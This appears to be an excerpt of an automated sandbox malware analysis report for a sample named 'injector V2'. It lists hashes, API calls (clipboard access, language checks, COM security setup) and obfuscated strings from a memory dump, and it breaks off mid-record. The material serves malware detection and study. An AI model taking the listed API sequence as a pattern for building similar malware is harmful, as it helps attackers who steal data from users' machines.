                                                                                    • Opcode Fuzzy Hash: e2e4a7a582348601e141d1a64f92d77e41cde39af5ebceb16fd8896977840cd7
                                                                                    • Instruction Fuzzy Hash: 3E7106756043419BEB15EF28C850A2FB3E2FFC9350F19C42DE6858B356E738D861978A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 227b3ff5576315b635a7910336eeac6758ebc8b89ea0154b3321cb937fa4b268
                                                                                    • Instruction ID: fd94310adb4de760c7d7c3a3ca757dfebc471b0dc2fb50c609f975835bcd1d9b
                                                                                    • Opcode Fuzzy Hash: 227b3ff5576315b635a7910336eeac6758ebc8b89ea0154b3321cb937fa4b268
                                                                                    • Instruction Fuzzy Hash: F7514B76A0D3009FE310DF65EC8175BB7E5EB86314F04853DF68487281E779990ACB9A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3376c5780ff4783cba57ca5b2ed756fdeca83758466a62a9a568b40f5c76f192
                                                                                    • Instruction ID: e32dd57dfee8a6373bd6d9c6ffa489eeaa640e30f2edf390baa49a0d4f32e9e2
                                                                                    • Opcode Fuzzy Hash: 3376c5780ff4783cba57ca5b2ed756fdeca83758466a62a9a568b40f5c76f192
                                                                                    • Instruction Fuzzy Hash: 946107B4D002404FE704DF68C955BAEBBB1BB45304F1941ACD8886B385D778C846CBE6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 151a0b0d1d0d1be4cc1d159a629a451b5c7fe46777ba24f86f3b905103d69d3c
                                                                                    • Instruction ID: 684847568e63329ad74cab9d0d2d3044732733c62a1d1e84330838568e632740
                                                                                    • Opcode Fuzzy Hash: 151a0b0d1d0d1be4cc1d159a629a451b5c7fe46777ba24f86f3b905103d69d3c
                                                                                    • Instruction Fuzzy Hash: 021106356942449BEF048FA4DD967EE7FB2EF5A304F2440ADC041B7392D6398D458B5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1d5f4ec3c9038722f1d4064c3d749de1a29aeeec8a9c3730a1ed6e76fe59fcc5
                                                                                    • Instruction ID: 6223a200e89733de9b39cbb2e55d4e3386871cbfeb0ebab32caeb2a371115a50
                                                                                    • Opcode Fuzzy Hash: 1d5f4ec3c9038722f1d4064c3d749de1a29aeeec8a9c3730a1ed6e76fe59fcc5
                                                                                    • Instruction Fuzzy Hash: 63F039756183049FE7449F21EC847AAB3F5EB86305F41982CF99193261EB70D809DA0A

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 650 43752b-437584 call 43f550 call 418480 * 2 GetUserDefaultUILanguage 657 437589-437597 650->657 657->657 658 437599-4375a2 657->658 659 4375a4-4375a7 658->659 660 4375e0-43760e 659->660 661 4375a9-4375de 659->661 661->659
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNELBASE ref: 00437557
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: DefaultLanguageUser
                                                                                    • String ID: e$v$w
                                                                                    • API String ID: 95929093-3612681874
                                                                                    • Opcode ID: 7a0c0f3006529894f765e2799cfbaa29dc2c6a1760577915c5aaf8166dc81fd6
                                                                                    • Instruction ID: e16cee4b57f901d5de6ee18429f121bfe74fff0e0723030549257062cbd6a79e
                                                                                    • Opcode Fuzzy Hash: 7a0c0f3006529894f765e2799cfbaa29dc2c6a1760577915c5aaf8166dc81fd6
                                                                                    • Instruction Fuzzy Hash: 0B21D435A052D68FCB28CB78CC507AD7FA16F4A314F0985FDD49AA7B82EA784D408B51
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043B0F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: 067062678a84efdd0e7db51d0cfa6fe89f7adf20a88878a0838a84ed2eadcfe8
                                                                                    • Instruction ID: 0e8247adfe53c3d58792063fc2aa977bfa5c3ef0f2d592079fb2eb92c1b7fc94
                                                                                    • Opcode Fuzzy Hash: 067062678a84efdd0e7db51d0cfa6fe89f7adf20a88878a0838a84ed2eadcfe8
                                                                                    • Instruction Fuzzy Hash: 68014472A243508FC7089B64ECA5B2B7BA5EFC6305F0A403DDA81876A0E7B45810D7D6
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 0043E6E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ForegroundWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2020703349-0
                                                                                    • Opcode ID: ff2f1a7e420edd10458626377f7d2e8dfe6041faebf13f43ff61b7bb79c1b383
                                                                                    • Instruction ID: 69545db2e6297d019d21189510e34310e0b631507fbc220568edd7c86cc665cc
                                                                                    • Opcode Fuzzy Hash: ff2f1a7e420edd10458626377f7d2e8dfe6041faebf13f43ff61b7bb79c1b383
                                                                                    • Instruction Fuzzy Hash: 45F0F0BA9010019FDB018F74E85566ABBA0FF1A310F1499A5D052C73A2D6388952CB48
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlanketProxy
                                                                                    • String ID:
                                                                                    • API String ID: 3890896728-0
                                                                                    • Opcode ID: 8c12ec45013d332c1a3d2d77874da8384313247d51add3fe2471fd63d967a25f
                                                                                    • Instruction ID: a984b5ad6936b49ee2f461f34ab930f86c3eb08b7b20e116be4e87e6f8979fce
                                                                                    • Opcode Fuzzy Hash: 8c12ec45013d332c1a3d2d77874da8384313247d51add3fe2471fd63d967a25f
                                                                                    • Instruction Fuzzy Hash: D4F0AFB46183428FE310DF24C5A974BBBE4BB8A308F10891CE5944B295CBB99648CB82
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlanketProxy
                                                                                    • String ID:
                                                                                    • API String ID: 3890896728-0
                                                                                    • Opcode ID: 08dafdfdfe9a7c9b6191068d195533e3b66fd54997fee8b243fdf1bbc06b4a11
                                                                                    • Instruction ID: 132b52fd7802fe4bfc6d3a7148e392146a2953d2c6d09b9c10ac09a149df5120
                                                                                    • Opcode Fuzzy Hash: 08dafdfdfe9a7c9b6191068d195533e3b66fd54997fee8b243fdf1bbc06b4a11
                                                                                    • Instruction Fuzzy Hash: 7EF0A9B45057018FD344DF28C5A871ABBE0AB89704F10481CE0958B3A0DB759548CF81
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?,?,0041197E), ref: 0043B060
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: c68143cb518e74a69266f4930f3d8b431186b7bd823fea2b57977c23afd500a3
                                                                                    • Instruction ID: 4c64f78faed6f1d0fb51450777116b3bddbd2d2e4b33a2b21e8f3e9e9918578c
                                                                                    • Opcode Fuzzy Hash: c68143cb518e74a69266f4930f3d8b431186b7bd823fea2b57977c23afd500a3
                                                                                    • Instruction Fuzzy Hash: FEE048341087405BD7495B2498A1A6B7B61DB9A720F20156DE0D2936F1C7269817DE45
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 0043E6E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ForegroundWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2020703349-0
                                                                                    • Opcode ID: 5378d3d2048bdbd916e0b8f81ff029b74cb5789b742d7d28b86c7719156b9cbc
                                                                                    • Instruction ID: 5dcfcd798132ed83e6b68411b09b756ab74c9c7dc729c48ee306d9ced8dab402
                                                                                    • Opcode Fuzzy Hash: 5378d3d2048bdbd916e0b8f81ff029b74cb5789b742d7d28b86c7719156b9cbc
                                                                                    • Instruction Fuzzy Hash: 69F0C2BAE41104EFCB04DFA4FC958A9B7B2FB0A315B2404A9E502A7371DB71A915CF49
                                                                                    APIs
                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D273
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    • Opcode ID: 5b077bfe4455e23a3c674899ef49d65f04014d2006343274f3f84038a774a7f6
                                                                                    • Instruction ID: f853df7a29e590a315f10d920dec143745f9287da6b926524a5840ccd99faa2d
                                                                                    • Opcode Fuzzy Hash: 5b077bfe4455e23a3c674899ef49d65f04014d2006343274f3f84038a774a7f6
                                                                                    • Instruction Fuzzy Hash: 73D05E745901446BD200AB28AC06F2236688343B25F444235B6A2C61D7E9116914C56A
                                                                                    APIs
                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D2A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeSecurity
                                                                                    • String ID:
                                                                                    • API String ID: 640775948-0
                                                                                    • Opcode ID: 94ae0bf42bc59fadde0ff639082cce8abde593e835750ad71f1e7d69a4288824
                                                                                    • Instruction ID: 2d7b7a70427f1330292365c5a8f411c4952d63840b4a80755c1cfceed43a82c1
                                                                                    • Opcode Fuzzy Hash: 94ae0bf42bc59fadde0ff639082cce8abde593e835750ad71f1e7d69a4288824
                                                                                    • Instruction Fuzzy Hash: 02D0C9743D438176F2748B0CAC53F5436546307F12F300224B322FE2D0CAE071058A1D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: " $"B$2- ($7654$SQ$W@$\2$n9m;$r1`3$u5`7$}s$}s
                                                                                    • API String ID: 0-327531642
                                                                                    • Opcode ID: 4763f4544488dc213c48f2e26bd059baeeca52c6088159a995f66b0bddd8cd24
                                                                                    • Instruction ID: 1ec7e797cd9eb8f4d7ad4eff3564fad9b8d8c7c05487f80a661f34697a0983b7
                                                                                    • Opcode Fuzzy Hash: 4763f4544488dc213c48f2e26bd059baeeca52c6088159a995f66b0bddd8cd24
                                                                                    • Instruction Fuzzy Hash: 8492FDB5A00B16DFDB14CF25D8806AABBB2FF45300F56855DC499AF761DB34A852CF80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: w1u$$W U$+[&Y$1UVW$=O?M$X+\)$bkB$c/g-$cS'Q$
                                                                                    • API String ID: 0-1107640020
                                                                                    • Opcode ID: d094553142b8fa0c3f843ef86b2216bf43cee4b104b0197a05f46ab8b87a6c2c
                                                                                    • Instruction ID: 07adb09d38e0d3280f8d28688e1147cd8a6c36b3ce6469b78c24922fb3c68d64
                                                                                    • Opcode Fuzzy Hash: d094553142b8fa0c3f843ef86b2216bf43cee4b104b0197a05f46ab8b87a6c2c
                                                                                    • Instruction Fuzzy Hash: 8BD1E0B8608380DFE7209F25E88176BBBB1FBC2304F51496DF5854B261E7759806CB86
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1647500905-0
                                                                                    • Opcode ID: ce365d0da545476f18f4140f590a68767b83894f9fd16f6a09fcb78067349483
                                                                                    • Instruction ID: 17803934bde16856924c357768b87d9616dc2f9b743b2c2e0f5da409e4691948
                                                                                    • Opcode Fuzzy Hash: ce365d0da545476f18f4140f590a68767b83894f9fd16f6a09fcb78067349483
                                                                                    • Instruction Fuzzy Hash: 4451F1B1808781DFD710AF78D54A39EBFA0AB15305F04863EE4858B782E37D9658C797
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: 7654$7654$K7$`b]}
                                                                                    • API String ID: 2994545307-3105809555
                                                                                    • Opcode ID: 9802f542914dd4b860a900ac3f1736758820710e1b073b33d4eb07b853cfbc3e
                                                                                    • Instruction ID: 64c6081f0a2204a6899387c6940b517753b686c6832b0442df47da2492da9ce9
                                                                                    • Opcode Fuzzy Hash: 9802f542914dd4b860a900ac3f1736758820710e1b073b33d4eb07b853cfbc3e
                                                                                    • Instruction Fuzzy Hash: C3223475A093409BD714CF28D890BABB792EF96304F19856ED0C687362D774DC86CB8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .zH$4;$HzH$|}
                                                                                    • API String ID: 0-2754067922
                                                                                    • Opcode ID: 16c00d66ed237cb7ac5fd89160097f63f69d048809e64baff63aaf6f17e4c28a
                                                                                    • Instruction ID: 4c80123772d873f3d2cee772b4d38be2c1a2a5879bcda46720ca7d40980cb5f3
                                                                                    • Opcode Fuzzy Hash: 16c00d66ed237cb7ac5fd89160097f63f69d048809e64baff63aaf6f17e4c28a
                                                                                    • Instruction Fuzzy Hash: 511286B4D00205CBCB14CF69C8916EFBBB1FF46324F18852DE8956B385E338A946CB95
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .y7/$`o$cb`d$gzyi
                                                                                    • API String ID: 0-1486537593
                                                                                    • Opcode ID: f4fd3634d7af85613517cb621c8590516dddc43ecd63ca63492b3f332954c7e4
                                                                                    • Instruction ID: 73ee5e978b3ae7903bd64636a7987c208e490655bfc664e26e61893c9cb750fe
                                                                                    • Opcode Fuzzy Hash: f4fd3634d7af85613517cb621c8590516dddc43ecd63ca63492b3f332954c7e4
                                                                                    • Instruction Fuzzy Hash: 141247B5A0C3518BD714CF25E85126BBBE1EFD6304F08896EE4C59B341D738D90ACB9A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Lz$`{$uy$~I
                                                                                    • API String ID: 0-1638023654
                                                                                    • Opcode ID: 4939bdcd720d2d8cadce823c6c50284a5e7931ace41ba08f26985008098efa05
                                                                                    • Instruction ID: 342cf044e97a58d3db7132360508a74081fc9fafca0238ac93fdbfb74b7ec0f7
                                                                                    • Opcode Fuzzy Hash: 4939bdcd720d2d8cadce823c6c50284a5e7931ace41ba08f26985008098efa05
                                                                                    • Instruction Fuzzy Hash: 02E1FDB16083209BC714CF14D86136BBBE1EFD5714F08891DE8C69B3A1E779C905CB8A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: _z5@$_z5@$qz5@$qz5@
                                                                                    • API String ID: 0-1441355546
                                                                                    • Opcode ID: ac0fb15dc88d696ed3d50c071f0ac3644f2aab8c5deaa3ad17473f714e21756e
                                                                                    • Instruction ID: 1cb89060f304c113218be3815143164a3d7a474535087d2138f222ec7f76e972
                                                                                    • Opcode Fuzzy Hash: ac0fb15dc88d696ed3d50c071f0ac3644f2aab8c5deaa3ad17473f714e21756e
                                                                                    • Instruction Fuzzy Hash: FF41E1715083208BCB149F14E81063BB7F1FFA6345F54991DE8D65B3A4E7398910C78B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: E"WX$S#r^$Z,ST$[-I3
                                                                                    • API String ID: 0-2576035952
                                                                                    • Opcode ID: 13f34c4f50a1a07fab51708d4b918bbe42c87a8ccd365ccb80dfaec5ebea47d5
                                                                                    • Instruction ID: 5a39df12ac70cea910d9df69709fed57744f71d54cded374284f8fdc3c439ac4
                                                                                    • Opcode Fuzzy Hash: 13f34c4f50a1a07fab51708d4b918bbe42c87a8ccd365ccb80dfaec5ebea47d5
                                                                                    • Instruction Fuzzy Hash: 3F3124B0514B908BC7658F3982603A3BBE1BF86314F58699DC4E387B92C739F442CB04
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HF$IE$ZM
                                                                                    • API String ID: 0-58942596
                                                                                    • Opcode ID: 7e84ae3a88c0c4df319599b0c6c06f440f3123c486e635d0d3d9c278290470a8
                                                                                    • Instruction ID: 4d70116105068fe0a1585b5fee28dcb06b75358869d2f7aee483e1b39d9b0351
                                                                                    • Opcode Fuzzy Hash: 7e84ae3a88c0c4df319599b0c6c06f440f3123c486e635d0d3d9c278290470a8
                                                                                    • Instruction Fuzzy Hash: 3DC112B06083108BD724CF25D95176BB7F1FFA2350F488A5DE4D28B3A4E7B99904CB96
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: F@VI$Nxnq$cp
                                                                                    • API String ID: 0-4002531926
                                                                                    • Opcode ID: 24dfb663d71b8e09813bf0f5456dca11cc10d3d639255235cb3a0c78bdf79dfb
                                                                                    • Instruction ID: 8a29cccb321ec278c30b7ffc1d55adb7a6b13275fc88ca724196cb343f14b233
                                                                                    • Opcode Fuzzy Hash: 24dfb663d71b8e09813bf0f5456dca11cc10d3d639255235cb3a0c78bdf79dfb
                                                                                    • Instruction Fuzzy Hash: 758113B59083918FD314CF24D84166FBBE2AF85304F18896EE8D687392E679D845CB87
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 2J@$BK@$I@
                                                                                    • API String ID: 0-187361804
                                                                                    • Opcode ID: f6f0e5eb5162b6aaf46d31c3b152c7532c3223376071486b5f055edd2ef6a495
                                                                                    • Instruction ID: f7c6d29b76e65a0d0bf1f6299292556ecd118515f81c415ee8970d329b3b0465
                                                                                    • Opcode Fuzzy Hash: f6f0e5eb5162b6aaf46d31c3b152c7532c3223376071486b5f055edd2ef6a495
                                                                                    • Instruction Fuzzy Hash: B571AC79609602CFDB08CF24E4A03AA77F1FB8A346F05807DE8858B292D775D985DF85
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: cb`d$gzyi
                                                                                    • API String ID: 0-146784027
                                                                                    • Opcode ID: bec2e082f871bcbef0e6bbc3144a8f27d38fbbb0c4eb39aaa73caa54c4155fae
                                                                                    • Instruction ID: 589721233e1184f7b93af10d955cab5016d861bdc776373f3e67ebdef895139e
                                                                                    • Opcode Fuzzy Hash: bec2e082f871bcbef0e6bbc3144a8f27d38fbbb0c4eb39aaa73caa54c4155fae
                                                                                    • Instruction Fuzzy Hash: 67F118B560C3518BC714DF25E89126BB7E1EF96304F08887EE4C597342E739D909CB5A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: KI$HG
                                                                                    • API String ID: 0-4172485573
                                                                                    • Opcode ID: 555c5214fa72487ea4b92ae4822a369f5b784a6da2c74b3ea09a70866b7c575f
                                                                                    • Instruction ID: 6a685d6eb0282b07ecb379a0196d98a8d9aa843b7ad2a680190e5a876f5630f6
                                                                                    • Opcode Fuzzy Hash: 555c5214fa72487ea4b92ae4822a369f5b784a6da2c74b3ea09a70866b7c575f
                                                                                    • Instruction Fuzzy Hash: 8FD1EF7A528222CBCB14AF3CD85126BB7E1FF4A711F0A8C7DC481972A0E7798C50D755
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 40F3$z\B
                                                                                    • API String ID: 0-426307818
                                                                                    • Opcode ID: 45f379b2dae90aea72c51e9e702bd7fff7091b14a155fa3f666690b9af15ba42
                                                                                    • Instruction ID: 498da2e28091b230820d302b17542d13e6b523f95bed6f1ccb4e6a02f20431bc
                                                                                    • Opcode Fuzzy Hash: 45f379b2dae90aea72c51e9e702bd7fff7091b14a155fa3f666690b9af15ba42
                                                                                    • Instruction Fuzzy Hash: 52A10671604B818FE329CB39D4A17A7BBD1AF53304F58885EC0EB8B392D7796405CB65
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 40F3$z\B
                                                                                    • API String ID: 0-426307818
                                                                                    • Opcode ID: 894d52e7406151b6594a9adfcf0dd35d61f7e320749617ee7a9955ca99d959aa
                                                                                    • Instruction ID: 034a7008790bf69728bdf75bd2974393d91308eb0864f51b0121dd2d4574678b
                                                                                    • Opcode Fuzzy Hash: 894d52e7406151b6594a9adfcf0dd35d61f7e320749617ee7a9955ca99d959aa
                                                                                    • Instruction Fuzzy Hash: E5A10570604B818FE329CB39D4A17A7BBD2AF53304F58845EC0EB8B392D7796006CB65
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 40F3$z\B
                                                                                    • API String ID: 0-426307818
                                                                                    • Opcode ID: 29e53cf9b020ad464fdf824bbb6578da22d00ff9ce7fb0d1a3217d04609603cf
                                                                                    • Instruction ID: bee1a0546301b459e96431053b5b94568506ebc424ead06ad1a0df34fef16323
                                                                                    • Opcode Fuzzy Hash: 29e53cf9b020ad464fdf824bbb6578da22d00ff9ce7fb0d1a3217d04609603cf
                                                                                    • Instruction Fuzzy Hash: 92A1F571604B818FE329CB39D4A17A7BBD2AF53304F58845EC0EB8B392D7796406CB65
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 40F3$z\B
                                                                                    • API String ID: 0-426307818
                                                                                    • Opcode ID: 92d84887212e068ebb43c38c83c2115f7bf3f104c6853f619a4717065197e9db
                                                                                    • Instruction ID: 53d5a600ad2fb64aa9eefa9411e692cf7a0f670bbf2d035d9d804fd55e83da83
                                                                                    • Opcode Fuzzy Hash: 92d84887212e068ebb43c38c83c2115f7bf3f104c6853f619a4717065197e9db
